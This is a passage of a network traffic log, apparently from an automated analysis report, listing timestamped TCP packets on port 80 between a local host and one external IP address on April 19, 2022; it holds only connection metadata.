Apr 19, 2022 16:44:44.734292030 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.734366894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.734425068 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.734491110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.734574080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.734684944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.734745026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.734810114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.734865904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.734909058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.735028982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.735166073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.735238075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.735294104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.735367060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.735411882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.735487938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.735621929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.735696077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.735743046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.735790968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.735877037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.735970020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.736088037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.736136913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.736160040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.736202955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.736299992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.736426115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.736546993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.736613035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.736676931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.736731052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.736745119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.736845970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.737008095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.737061977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.737175941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.737215042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.737221956 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.737299919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.737445116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.737503052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.737549067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.737596035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.737692118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.737765074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.737852097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.737903118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.737972975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.738023043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.738091946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.738255978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.738327980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.738390923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.738435984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.738492966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.738565922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.738651991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.738780975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.738840103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.738965034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.739003897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.739022017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.739128113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.739248991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.739305019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.739376068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.739460945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.739463091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.739675999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.739729881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.739743948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.739830017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.739917994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.739958048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.740056992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.740118027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.740175962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.740262032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.740400076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.740458012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.740459919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.740525007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.740722895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.740763903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.740852118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.740906954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.740969896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.741031885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.741071939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.741214991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.741261005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.741276026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.741451979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.741519928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.741573095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.741637945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.741692066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.741725922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.741929054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.741981983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.742055893 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.742144108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.742182970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.742197037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.742237091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.742383003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.742434025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.742491961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.742546082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.742626905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.742743015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.742814064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.742866993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.742928028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.742984056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.743026018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.743261099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.743340015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.743392944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.743424892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.743477106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.743536949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.743663073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.743782043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.743830919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.743864059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.743916035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.743973970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.744144917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.744208097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.744256973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.744344950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.744402885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.744554996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.744576931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.744663000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.744712114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.744745016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.744791985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.744895935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.744987011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.745131016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.745187998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.745261908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.745312929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.745346069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.745465994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.745543003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.745598078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.745656013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.745785952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.745841026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.745946884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.746000051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.746017933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.746273994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.746298075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.746330023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.746354103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.746378899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.746491909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.746572971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.746710062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.746759892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.746778011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.746833086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.746942997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.747013092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.747123003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.747169971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.747263908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.747308969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.747347116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.747467995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.747581959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.747632980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.747693062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.747745991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.747823954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.747927904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.748061895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.748125076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.748183012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.748264074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.748294115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.748359919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.748408079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.748512030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.748595953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.748680115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.748737097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.748852015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.748912096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.749006033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.749181032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.749397993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.749455929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.749464035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.749517918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.749522924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.749543905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.749654055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.749716997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.749752045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.749808073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.749918938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.750001907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.750103951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.750157118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.750236034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.750356913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.750394106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.750432968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.750509977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.750552893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.750674009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.750813007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.750869036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.750886917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.750935078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.750979900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.751116991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.751204014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.751257896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.751351118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.751408100 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.751441002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.751542091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.751668930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.751725912 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.751787901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.751846075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.751904964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.752028942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.752125025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.752187967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.752204895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.752255917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.752334118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.752458096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.752559900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.752615929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.752698898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.752762079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.752765894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.752898932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.753014088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.753067970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.753133059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.753184080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.753257990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.753361940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.753457069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.753504992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.753559113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.753607988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.753731012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.753835917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.753891945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.753911972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.754020929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.754132986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.754182100 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.754285097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.754336119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.754379988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.754497051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.754616022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.754664898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.754710913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.754765987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.754815102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.754937887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.755095959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.755146027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.755175114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.755223989 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.755323887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.755424976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.755537033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.755589008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.755656004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.755707979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.755736113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.755844116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.755976915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.756036997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.756043911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.756109953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.756232977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.756341934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.756417036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.756478071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.756550074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.756603003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.756634951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.756743908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.756804943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.756899118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.757019997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.757095098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.757102013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.757220030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.757272005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.757337093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.757417917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.757558107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.757611036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.757657051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.757780075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.757848978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.757894039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.757951975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.758008957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.758126974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.758261919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.758321047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.758342981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.758392096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.758460999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.758579969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.758629084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.758730888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.758779049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.758941889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.758989096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.759037018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.759087086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.759136915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.759263992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.759382010 CEST	80	49758	45.135.48.153	192.168.2.4
